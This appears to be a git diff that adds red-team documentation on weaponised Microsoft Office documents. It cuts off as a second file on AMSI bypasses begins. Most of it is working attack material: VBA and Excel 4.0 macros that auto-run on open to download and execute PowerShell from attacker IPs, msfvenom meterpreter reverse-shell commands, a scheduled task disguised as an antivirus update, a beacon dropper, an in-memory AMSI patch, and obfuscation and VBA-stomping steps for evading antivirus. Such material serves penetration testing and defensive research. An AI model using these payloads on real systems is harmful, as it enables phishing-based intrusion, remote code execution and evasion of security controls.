LBound(buf) To UBound(buf) + data = buf(counter) + res = RtlMoveMemory(addr + counter, data, 1) + Next counter + res = CreateThread(0, 0, addr, 0, 0, 0) + + +End Sub +``` + + +## Excel + +### XLSM - Hot Manchego + +> When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine. + +* https://github.com/FortyNorthSecurity/hot-manchego + +```ps1 +Generate CS Macro and save it to Windows as vba.txt +PS> New-Item blank.xlsm +PS> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs +PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt +``` + +### XLM - Macrome + +> XOR Obfuscation technique will NOT work with VBA macros since VBA is stored in a different stream that will not be encrypted when you password protect the document. This only works for Excel 4.0 macros. + +* https://github.com/michaelweber/Macrome/releases/download/0.3.0/Macrome-0.3.0-osx-x64.zip +* https://github.com/michaelweber/Macrome/releases/download/0.3.0/Macrome-0.3.0-linux-x64.zip +* https://github.com/michaelweber/Macrome/releases/download/0.3.0/Macrome-0.3.0-win-x64.zip + +```ps1 +# NOTE: The payload cannot contains NULL bytes. + +# Default calc +msfvenom -a x86 -b '\x00' --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f raw EXITFUNC=thread > popcalc.bin +msfvenom -a x64 -b '\x00' --platform windows -p windows/x64/exec cmd=calc.exe -e x64/xor -f raw EXITFUNC=thread > popcalc64.bin +# Custom shellcode +msfvenom -p generic/custom PAYLOADFILE=payload86.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o shellcode-86.bin -b '\x00' +msfvenom -p generic/custom PAYLOADFILE=payload64.bin -a x64 --platform windows -e x64/xor_dynamic -f raw -o shellcode-64.bin -b '\x00' +# MSF shellcode +msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.59 LPORT=443 -b '\x00' -a x64 --platform windows -e x64/xor_dynamic --platform windows -f raw -o msf64.bin +msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.59 LPORT=443 -b '\x00' -a x86 --encoder x86/shikata_ga_nai --platform windows -f raw -o msf86.bin + +dotnet Macrome.dll build --decoy-document decoy_document.xls --payload popcalc.bin --payload64-bit popcalc64.bin +dotnet Macrome.dll build --decoy-document decoy_document.xls --payload shellcode-86.bin --payload64-bit shellcode-64.bin + +# For VBA Macro +Macrome build --decoy-document decoy_document.xls --payload-type Macro --payload macro_example.txt --output-file-name xor_obfuscated_macro_doc.xls --password VelvetSweatshop +``` + +When using Macrome build mode, the --password flag may be used to encrypt the generated document using XOR Obfuscation. If the default password of **VelvetSweatshop** is used when building the document, all versions of Excel will automatically decrypt the document without any additional user input. This password can only be set in Excel 2003. + + +### XLM Excel 4.0 - SharpShooter + +* https://github.com/mdsecactivebreach/SharpShooter + +```powershell +# Options +-rawscfile Path to raw shellcode file for stageless payloads +--scfile Path to shellcode file as CSharp byte array +python SharpShooter.py --payload slk --rawscfile shellcode.bin --output test + +# Creation of a VBA Macro +# creates a VBA macro file that uses the the XMLDOM COM interface to retrieve and execute a hosted stylesheet. +SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl + +# Creation of an Excel 4.0 SLK Macro Enabled Document +~# /!\ The shellcode cannot contain null bytes +msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o shellcode-encoded.bin -b '\x00' +SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee + +msfvenom -p generic/custom PAYLOADFILE=payload86.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o /tmp/shellcode-86.bin -b '\x00' +SharpShooter.py --payload slk --output foo --rawscfile /tmp/shellcode-86.bin --smuggle --template mcafee +``` + + +### XLM Excel 4.0 - EXCELntDonut + +* XLM (Excel 4.0) macros pre-date VBA and can be delivered in .xls files. +* AMSI has no visibility into XLM macros (for now) +* Anti-virus struggles with XLM (for now) +* XLM macros can access the Win32 API (virtualalloc, createthread, ...) + +1. Open an Excel Workbook. +2. Right click on "Sheet 1" and click "Insert...". Select "MS Excel 4.0 Macro". +3. Open your EXCELntDonut output file in a text editor and copy everything. +4. Paste the EXCELntDonut output text in Column A of your XLM Macro sheet. +5. At this point, everything is in column A. To fix that, we'll use the "Text-to-Columns"/"Convert" tool under the "Data" tab. +6. Highlight column A and open the "Text-to-Columns" tool. Select "Delimited" and then "Semicolon" on the next screen. Select "Finished". +7. Right-click on cell A1* and select "Run". This will execute your payload to make sure it works. +8. To enable auto-execution, we need to rename cell A1* to "Auto_Open". You can do this by clicking into cell A1 and then clicking into the box that says "A1"* just above Column A. Change the text from "A1"* to "Auto_Open". Save the file and verify that auto-execution works. + +:warning: If you're using the obfuscate flag, after the Text-to-columns operation, your macros won't start in A1. Instead, they'll start at least 100 columns to the right. Scroll horizontally until you see the first cell of text. Let's say that cell is HJ1. If that's the case, then complete steps 6-7 substituting HJ1 for A1 + +```ps1 +git clone https://github.com/FortyNorthSecurity/EXCELntDonut + +-f path to file containing your C# source code (exe or dll) +-c ClassName where method that you want to call lives (dll) +-m Method containing your executable payload (dll) +-r References needed to compile your C# code (ex: -r 'System.Management') +-o output filename +--sandbox Perform basic sandbox checks. +--obfuscate Perform basic macro obfuscation. + +# Fork +git clone https://github.com/d-sec-net/EXCELntDonut/blob/master/EXCELntDonut/drive.py +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -platform:x64 -out:GruntHttpX64.exe C:\Users\User\Desktop\covenSource.cs +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -platform:x86 -out:GruntHttpX86.exe C:\Users\User\Desktop\covenSource.cs +donut.exe -a1 -o GruntHttpx86.bin GruntHttpX86.exe +donut.exe -a2 -o GruntHttpx64.bin GruntHttpX64.exe +usage: drive.py [-h] --x64bin X64BIN --x86bin X86BIN [-o OUTPUTFILE] [--sandbox] [--obfuscate] +python3 drive.py --x64bin GruntHttpx64.bin --x86bin GruntHttpx86.bin +``` + +XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f1391a7a598b456855/_posts/2020-05-25-Weaponizing-28-Year-Old-XLM-Macros.md + + +### XLM Excel 4.0 - EXEC + +1. Right Click to the current sheet +2. Insert a **Macro IntL MS Excel 4.0** +3. Add the `EXEC` macro + ```powershell + =EXEC("poWerShell IEX(nEw-oBject nEt.webclient).DownloAdStRiNg('http://10.10.10.10:80/update.ps1')") + =halt() + ``` +4. Rename cell to **Auto_open** +5. Hide your macro worksheet by a right mouse click on the sheet name **Macro1** and selecting **Hide** + + +### SLK - EXEC + +```ps1 +ID;P +O;E +NN;NAuto_open;ER101C1;KOut Flank;F +C;X1;Y101;K0;EEXEC("c:\shell.cmd") +C;X1;Y102;K0;EHALT() +E +``` + +## Word + +### DOCM - Metasploit + +```ps1 +use exploit/multi/fileformat/office_word_macro +set payload windows/meterpreter/reverse_http +set LHOST 10.10.10.10 +set LPORT 80 +set DisablePayloadHandler True +set PrependMigrate True +set FILENAME Financial2021.docm +exploit -j +``` + +### DOCM - Download and Execute + +> Detected by Defender (AMSI) + +```ps1 +Sub Execute() +Dim payload +payload = "powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$v=new-object net.webclient;$v.proxy=[Net.WebRequest]::GetSystemWebProxy();$v.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $v.downloadstring('http://10.10.10.10:4242/exploit');" +Call Shell(payload, vbHide) +End Sub +Sub Document_Open() +Execute +End Sub +``` + +### DOCM - Macro Creator + +* https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator + +```ps1 +# Shellcode embedded in the body of the MS-Word document, no obfuscation, no sandbox evasion: +C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d body +# Shellcode delivered over WebDAV covert channel, with obfuscation, no sandbox evasion: +C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -o +# Scriptlet delivered over bibliography source covert channel, with obfuscation, with sandbox evasion: +C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e +``` + +### DOCM - C# converted to Office VBA macro + +> A message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted. + +https://github.com/trustedsec/unicorn + +```ps1 +python unicorn.py payload.cs cs macro +``` + +### DOCM - VBA Wscript + +> https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office + +```ps1 +Sub parent_change() + Dim objOL + Set objOL = CreateObject("Outlook.Application") + Set shellObj = objOL.CreateObject("Wscript.Shell") + shellObj.Run("notepad.exe") +End Sub +Sub AutoOpen() + parent_change +End Sub +Sub Auto_Open() + parent_change +End Sub +``` + +```vb +CreateObject("WScript.Shell").Run "calc.exe" +CreateObject("WScript.Shell").Exec "notepad.exe" +``` + + +### DOCM - VBA Shell Execute Comment + +Set your command payload inside the **Comment** metadata of the document. + +```vb +Sub beautifulcomment() + Dim p As DocumentProperty + For Each p In ActiveDocument.BuiltInDocumentProperties + If p.Name = "Comments" Then + Shell (p.Value) + End If + Next +End Sub + +Sub AutoExec() + beautifulcomment +End Sub + +Sub AutoOpen() + beautifulcomment +End Sub +``` + + +### DOCM - VBA Spawning via svchost.exe using Scheduled Task + +```ps1 +Sub AutoOpen() + Set service = CreateObject("Schedule.Service") + Call service.Connect + Dim td: Set td = service.NewTask(0) + td.RegistrationInfo.Author = "Kaspersky Corporation" + td.settings.StartWhenAvailable = True + td.settings.Hidden = False + Dim triggers: Set triggers = td.triggers + Dim trigger: Set trigger = triggers.Create(1) + Dim startTime: ts = DateAdd("s", 30, Now) + startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2) + trigger.StartBoundary = startTime + trigger.ID = "TimeTriggerId" + Dim Action: Set Action = td.Actions.Create(0) + Action.Path = "C:\Windows\System32\powershell.exe" + Action.Arguments = "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))" + Call service.GetFolder("\").RegisterTaskDefinition("AVUpdateTask", td, 6, , , 3) +End Sub +Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))" +``` + +### DOCM - WMI COM functions + +Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)` + +```ps1 +Sub wmi_exec() + strComputer = "." + Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") + Set objStartUp = objWMIService.Get("Win32_ProcessStartup") + Set objProc = objWMIService.Get("Win32_Process") + Set procStartConfig = objStartUp.SpawnInstance_ + procStartConfig.ShowWindow = 1 + objProc.Create "powershell.exe", Null, procStartConfig, intProcessID +End Sub +``` + +* https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3 +* https://labs.inquest.net/dfi/sha256/f4266788d4d1bec6aac502ddab4f7088a9840c84007efd90c5be7ecaec0ed0c2 + +```ps1 +Sub ASR_bypass_create_child_process_rule5() + Const HIDDEN_WINDOW = 0 + strComputer = "." + Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2") + Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup") + Set objConfig = objStartup.SpawnInstance_ + objConfig.ShowWindow = HIDDEN_WINDOW + Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process") + objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'http://10.10.10.10/stage.ps1')", Null, objConfig, intProcessID +End Sub + +Sub AutoExec() + ASR_bypass_create_child_process_rule5 +End Sub + +Sub AutoOpen() + ASR_bypass_create_child_process_rule5 +End Sub +``` + +```ps1 +Const ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" +Set SW = GetObject("new:" & ShellWindows).Item() +SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0 +``` + +### DOCM/XLM - Macro Pack - Macro and DDE + +> Only the community version is available online. + +* [https://github.com/sevagas/macro_pack](https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe) + +```powershell +# Options +-G, --generate=OUTPUT_FILE_PATH. Generates a file. +-t, --template=TEMPLATE_NAME Use code template already included in MacroPack +-o, --obfuscate Obfuscate code (remove spaces, obfuscate strings, obfuscate functions and variables name) + +# Execute a command +echo "calc.exe" | macro_pack.exe -t CMD -G cmd.xsl + +# Download and execute a file +echo "" | macro_pack.exe -t DROPPER -o -G dropper.xls + +# Meterpreter reverse TCP template using MacroMeter by Cn33liz +echo | macro_pack.exe -t METERPRETER -o -G meter.docm + +# Drop and execute embedded file +macro_pack.exe -t EMBED_EXE --embed=c:\windows\system32\calc.exe -o -G my_calc.vbs + +# Obfuscate the vba file generated by msfvenom and put result in a new vba file. +msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba + +# Obfuscate Empire stager vba file and generate a MS Word document: +macro_pack.exe -f empire.vba -o -G myDoc.docm + +# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe) +echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm" + +# Execute calc.exe via Dynamic Data Exchange (DDE) attack +echo calc.exe | macro_pack.exe --dde -G calc.xslx + +# Download and execute file via powershell using Dynamic Data Exchange (DDE) attack +macro_pack.exe --dde -f ..\resources\community\ps_dl_exec.cmd -G DDE.xsl + +# PRO: Generate a Word file containing VBA self encoded x64 reverse meterpreter VBA payload (will bypass most AV). +msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o --autopack --keep-alive -G out.docm + +# PRO: Trojan a PowerPoint file with a reverse meterpreter. Macro is obfuscated and mangled to bypass AMSI and most antiviruses. +msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o --autopack --trojan -G hotpics.pptm + +# PRO: Generate an HTA payload able to run a shellcode via Excel injection +echo meterx86.bin meterx64.bin | macro_pack.exe -t AUTOSHELLCODE --run-in-excel -o -G samples\nicepic.hta +echo meterx86.bin meterx64.bin | macro_pack.exe -t AUTOSHELLCODE -o --hta-macro --run-in-excel -G samples\my_shortcut.lnk + +# PRO: XLM Injection +echo "MPPro" | macro_pack.exe -G _samples\hello.doc -t HELLO --xlm --run-in-excel + +# PRO: ShellCode Exec - Heap Injection, AlternativeInjection +echo "x32calc.bin" | macro_pack.exe -t SHELLCODE -o --shellcodemethod=HeapInjection -G test.doc +echo "x32calc.bin" | macro_pack.exe -t SHELLCODE -o --shellcodemethod=AlternativeInjection --background -G test.doc + +# PRO: More shellcodes +echo x86.bin | macro_pack.exe -t SHELLCODE -o -G test.pptm –keep-alive +echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o –autopack -G sc_auto.doc +echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls +``` + +### DOCM - BadAssMacros + +> C# based automated Malicous Macro Generator. + +* https://github.com/Inf0secRabbit/BadAssMacros + +```powershell +BadAssMacros.exe -h + +# Create VBA for classic shellcode injection from raw shellcode +BadAssMacros.exe -i -w -p no -s classic -c -o +BadAssMacros.exe -i .\Desktop\payload.bin -w doc -p no -s classic -c 23 -o .\Desktop\output.txt + +# Create VBA for indirect shellcode injection from raw shellcode +BadAssMacros.exe -i -w -p no -s indirect -o + +# List modules inside Doc/Excel file +BadAssMacros.exe -i -w -p yes -l + +# Purge Doc/Excel file +BadAssMacros.exe -i -w -p yes -o -m +``` + + +### DOCM - CACTUSTORCH VBA Module + +> CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript + +* https://github.com/mdsecactivebreach/CACTUSTORCH +* https://github.com/tyranid/DotNetToJScript/ +* CACTUSTORCH - DotNetToJScript all the things - https://youtu.be/YiaKb8nHFSY +* CACTUSTORCH - CobaltStrike Aggressor Script Addon - https://www.youtube.com/watch?v=_pwH6a-6yAQ + +1. Import **.cna** in Cobalt Strike +2. Generate a new VBA payload from the CACTUSTORCH menu +3. Download DotNetToJscript +4. Compile it + * **DotNetToJscript.exe** - responsible for bootstrapping C# binaries (supplied as input) and converting them to JavaScript or VBScript + * **ExampleAssembly.dll** - the C# assembly that will be given to DotNetToJscript.exe. In default project configuration, the assembly just pops a message box with the text "test" +5. Execute **DotNetToJscript.exe** and supply it with the ExampleAssembly.dll, specify the output file and the output type + ```ps1 + DotNetToJScript.exeExampleAssembly.dll -l vba -o test.vba -c cactusTorch + ``` +6. Use the generated code to replace the hardcoded binary in CactusTorch + + +### DOCM - MMG with Custom DL + Exec + +1. Custom Download in first Macro to "C:\\Users\\Public\\beacon.exe" +2. Create a custom binary execute using MMG +3. Merge both Macro + +```ps1 +git clone https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator +python MMG.py configs/generic-cmd.json malicious.vba +{ + "description": "Generic command exec payload\nEvasion technique set to none", + "template": "templates/payloads/generic-cmd-template.vba", + "varcount": 152, + "encodingoffset": 5, + "chunksize": 180, + "encodedvars": {}, + "vars": [], + "evasion": ["encoder"], + "payload": "cmd.exe /c C:\\Users\\Public\\beacon.exe" +} +``` + +```vb +Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long + +Public Function DownloadFileA(ByVal URL As String, ByVal DownloadPath As String) As Boolean + On Error GoTo Failed + DownloadFileA = False + 'As directory must exist, this is a check + If CreateObject("Scripting.FileSystemObject").FolderExists(CreateObject("Scripting.FileSystemObject").GetParentFolderName(DownloadPath)) = False Then Exit Function + Dim returnValue As Long + returnValue = URLDownloadToFile(0, URL, DownloadPath, 0, 0) + 'If return value is 0 and the file exist, then it is considered as downloaded correctly + DownloadFileA = (returnValue = 0) And (Len(Dir(DownloadPath)) > 0) + Exit Function + +Failed: +End Function + +Sub AutoOpen() + DownloadFileA "http://10.10.10.10/macro.exe", "C:\\Users\\Public\\beacon.exe" +End Sub + + +Sub Auto_Open() + DownloadFileA "http://10.10.10.10/macro.exe", "C:\\Users\\Public\\beacon.exe" +End Sub +``` + +### DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro + +Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control` + +```vb +Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle) +Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https:///file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus) +End Sub +``` + + + +### VBA Obfuscation + +```ps1 +# https://www.youtube.com/watch?v=L0DlPOLx2k0 +$ git clone https://github.com/bonnetn/vba-obfuscator +$ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin +``` + +### VBA Purging + +**VBA Stomping**: This technique allows attackers to remove compressed VBA code from Office documents and still execute malicious macros without many of the VBA keywords that AV engines had come to rely on for detection. == Removes P-code. + +:warning: VBA stomping is not effective against Excel 97-2003 Workbook (.xls) format. + +#### OfficePurge +* https://github.com/fireeye/OfficePurge/releases/download/v1.0/OfficePurge.exe + +```powershell +OfficePurge.exe -d word -f .\malicious.doc -m NewMacros +OfficePurge.exe -d excel -f .\payroll.xls -m Module1 +OfficePurge.exe -d publisher -f .\donuts.pub -m ThisDocument +OfficePurge.exe -d word -f .\malicious.doc -l +``` + + +#### EvilClippy + +> Evil Clippy uses the OpenMCDF library to manipulate CFBF files. +> Evil Clippy compiles perfectly fine with the Mono C# compiler and has been tested on Linux, OSX and Windows. +> If you want to manipulate CFBF files manually, then FlexHEX is one of the best editors for this. + +```ps1 +# OSX/Linux +mcs /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs +# Windows +csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs + +EvilClippy.exe -s fake.vbs -g -r cobaltstrike.doc +EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc +EvilClippy.exe -s fakecode.vba -t 2013x64 macrofile.doc + +# make macro code unaccessible is to mark the project as locked and unviewable: -u +# Evil Clippy can confuse pcodedmp and many other analysis tools with the -r flag. +EvilClippy.exe -r macrofile.doc +``` + + +### VBA - Offensive Security Template + +* Reverse Shell VBA - https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba +* Process Dumper - https://github.com/JohnWoodman/VBA-Macro-Dump-Process +* RunPE - https://github.com/itm4n/VBA-RunPE +* Spoof Parent - https://github.com/py7hagoras/OfficeMacro64 +* AMSI Bypass - https://github.com/outflanknl/Scripts/blob/master/AMSIbypasses.vba +* amsiByPassWithRTLMoveMemory - https://gist.github.com/DanShaqFu/1c57c02660b2980d4816d14379c2c4f3 +* VBA macro spawning a process with a spoofed parent - https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba + +### VBA - AMSI + +> The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection. https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/ + + +![](https://www.microsoft.com/security/blog/wp-content/uploads/2018/09/fig2-runtime-scanning-amsi-8-1024x482.png) + +:warning: It appears that p-code based attacks where the VBA code is stomped will still be picked up by the AMSI engine (e.g. files manipulated by our tool EvilClippy). + +The AMSI engine only hooks into VBA, we can bypass it by using Excel 4.0 Macro + +* AMSI Trigger - https://github.com/synacktiv/AMSI-Bypass + +```vb +Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr +Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr +Private Declare PtrSafe Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long +Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As LongPtr) + +Private Sub Document_Open() + Dim AmsiDLL As LongPtr + Dim AmsiScanBufferAddr As LongPtr + Dim result As Long + Dim MyByteArray(6) As Byte + Dim ArrayPointer As LongPtr + + MyByteArray(0) = 184 ' 0xB8 + MyByteArray(1) = 87 ' 0x57 + MyByteArray(2) = 0 ' 0x00 + MyByteArray(3) = 7 ' 0x07 + MyByteArray(4) = 128 ' 0x80 + MyByteArray(5) = 195 ' 0xC3 + + AmsiDLL = LoadLibrary("amsi.dll") + AmsiScanBufferAddr = GetProcAddress(AmsiDLL, "AmsiScanBuffer") + result = VirtualProtect(ByVal AmsiScanBufferAddr, 5, 64, 0) + ArrayPointer = VarPtr(MyByteArray(0)) + CopyMemory ByVal AmsiScanBufferAddr, ByVal ArrayPointer, 6 + +End Sub +``` + +### DOCX - Template Injection + +:warning: Does not require "Enable Macro" + +#### Remote Template + +1. A malicious macro is saved in a Word template .dotm file +2. Benign .docx file is created based on one of the default MS Word Document templates +3. Document from step 2 is saved as .docx +4. Document from step 3 is renamed to .zip +5. Document from step 4 gets unzipped +6. **.\word_rels\settings.xml.rels** contains a reference to the template file. That reference gets replaced with a reference to our malicious macro created in step 1. File can be hosted on a web server (http) or webdav (smb). + ```xml + + + ``` + ```xml + + ``` +7. File gets zipped back up again and renamed to .docx + +#### Template Injections Tools + +* https://github.com/JohnWoodman/remoteInjector +* https://github.com/ryhanson/phishery + +```ps1 +$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx +[+] Opening Word document: good.docx +[+] Setting Word document template to: https://secure.site.local/docs +[+] Saving injected Word document to: bad.docx +[*] Injected Word document has been saved! +``` + + +### DOCX - DDE + +* Insert > QuickPart > Field +* Right Click > Toggle Field Code +* `{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }` + + +## References + +* [VBA RunPE Part 1 - itm4n](https://itm4n.github.io/vba-runpe-part1/) +* [VBA RunPE Part 2 - itm4n](https://itm4n.github.io/vba-runpe-part2/) +* [Office VBA AMSI Parting the veil on malicious macros - Microsoft](https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/) +* [Bypassing AMSI fro VBA - Outflank](https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/) +* [Evil Clippy MS Office Maldoc Assistant - Outflank](https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/) +* [Old schoold evil execl 4.0 macros XLM - Outflank](https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/) +* [Excel 4 Macro Generator x86/x64 - bytecod3r](https://bytecod3r.io/excel-4-macro-generator-x86-x64/) +* [VBad - Pepitoh](https://github.com/Pepitoh/VBad) +* [Excel 4.0 Macro Function Reference PDF](https://d13ot9o61jdzpp.cloudfront.net/files/Excel%204.0%20Macro%20Functions%20Reference.pdf) +* [Excel 4.0 Macros so hot right now - SneekyMonkey](https://www.sneakymonkey.net/2020/06/22/excel-4-0-macros-so-hot-right-now/) +* [Macros and more with sharpshooter v2.0 - mdsec](https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/) +* [Further evasion in the forgotten corners of ms xls - malware.pizza](https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/) +* [Excel 4.0 macro old but new - fsx30](https://medium.com/@fsx30/excel-4-0-macro-old-but-new-967071106be9) +* [XLS 4.0 macros and covenant - d-sec](https://d-sec.net/2020/10/24/xls-4-0-macros-and-covenant/) +* [Inject macro from a remote dotm template - ired.team](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros) +* [Phishinh with OLE - ired.team](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-ole-+-lnk) +* [Phishing SLK - ired.team](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-.slk-excel)bypassing-malicious-macro-detections-by-defeating-child-parent-process-relationships) +* [PropertyBomb an old new technique for arbitrary code execution in vba macro - Leon Berlin - 22 May 2018](https://www.bitdam.com/2018/05/22/propertybomb-an-old-new-technique-for-arbitrary-code-execution-in-vba-macro/) +* [AMSI in the heap - rmdavy](https://secureyourit.co.uk/wp/2020/04/17/amsi-in-the-heap/) +* [WordAMSIBypass - rmdavy](https://github.com/rmdavy/WordAmsiBypass) +* [Dechaining macros and evading EDR - Noora Hyvärinen](https://blog.f-secure.com/dechaining-macros-and-evading-edr/) +* [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html) +* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/) +* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948) +* [Anti-Analysis Techniques Used in Excel 4.0 Macros - 24 March 2021 - @Jacob_Pimental](https://www.goggleheadedhacker.com/blog/post/23) +* [So you think you can block Macros? - Pieter Ceelen - April 25, 2023](https://outflank.nl/blog/2023/04/25/so-you-think-you-can-block-macros/) \ No newline at end of file diff --git a/docs/redteam/Windows - AMSI Bypass.md b/docs/redteam/Windows - AMSI Bypass.md new file mode 100644 index 0000000..14c6cdf --- /dev/null +++ b/docs/redteam/Windows - AMSI Bypass.md @@ -0,0 +1,778 @@ +# Windows - AMSI Bypass + +## Summary + +* [List AMSI Providers](#list-amsi-providers) +* [Which Endpoint Protection is Using AMSI](#which-endpoint-protection-is-using-amsi) +* [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse) +* [Dont use net webclient](#Dont-use-net-webclient) +* [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](#Amsi-ScanBuffer-Patch) +* [Forcing an error](#Forcing-an-error) +* [Disable Script Logging](#Disable-Script-Logging) +* [Amsi Buffer Patch - In memory](#Amsi-Buffer-Patch---In-memory) +* [Same as 6 but integer Bytes instead of Base64](#Same-as-6-but-integer-Bytes-instead-of-Base64) +* [Using Matt Graeber's Reflection method](#Using-Matt-Graebers-Reflection-method) +* [Using Matt Graeber's Reflection method with WMF5 autologging bypass](#Using-Matt-Graebers-Reflection-method-with-WMF5-autologging-bypass) +* [Using Matt Graeber's second Reflection method](#Using-Matt-Graebers-second-Reflection-method) +* [Using Cornelis de Plaa's DLL hijack method](#Using-Cornelis-de-Plaas-DLL-hijack-method") +* [Use Powershell Version 2 - No AMSI Support there](#Using-PowerShell-version-2) +* [Nishang all in one](#Nishang-all-in-one) +* [Adam Chesters Patch](#Adam-Chester-Patch) +* [AMSI.fail](#amsifail) + +## List AMSI Providers + +* List providers with : `Get-ChildItem 